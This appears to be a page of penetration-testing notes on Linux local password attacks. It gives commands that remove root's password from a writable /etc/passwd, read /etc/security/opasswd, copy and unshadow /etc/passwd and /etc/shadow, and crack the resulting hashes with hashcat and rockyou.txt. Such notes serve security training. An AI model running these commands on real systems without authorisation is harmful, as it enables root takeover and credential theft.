Passwd, Shadow & Opasswd

Passwd File

# It the /etc/passwd file is writable by us

# Editing /etc/passwd - Before
root:x:0:0:root:/root:/bin/bash

# Editing /etc/passwd - After
root::0:0:root:/root:/bin/bash

Shadow File

If the password field contains a character, such as ! or * the user cannot log in with a Unix password. However, other authentication methods for logging in, such as Kerberos or key-based authentication, can still be used.

Algorithm Types

  • $1$ – MD5

  • $2a$ – Blowfish

  • $2y$ – Eksblowfish

  • $5$ – SHA-256

  • $6$ – SHA-512

Opasswd

The PAM library (pam_unix.so) can prevent reusing old passwords. The file where old passwords are stored is the /etc/security/opasswd. Administrator/root permissions are also required to read the file if the permissions for this file have not been changed manually.

# Reading /etc/security/opasswd 
sudo cat /etc/security/opasswd

Cracking Linux Credentials

Unshadow

sudo cp /etc/passwd /tmp/passwd.bak
sudo cp /etc/shadow /tmp/shadow.bak
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

Hashcat - Cracking Unshadowed Hashes

hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

Hashcat - Cracking MD5 Hashes

hashcat -m 500 -a 0 md5-hashes.list rockyou.txt
PreviousCredential Hunting in LinuxNextWindows Local Password Attacks

Last updated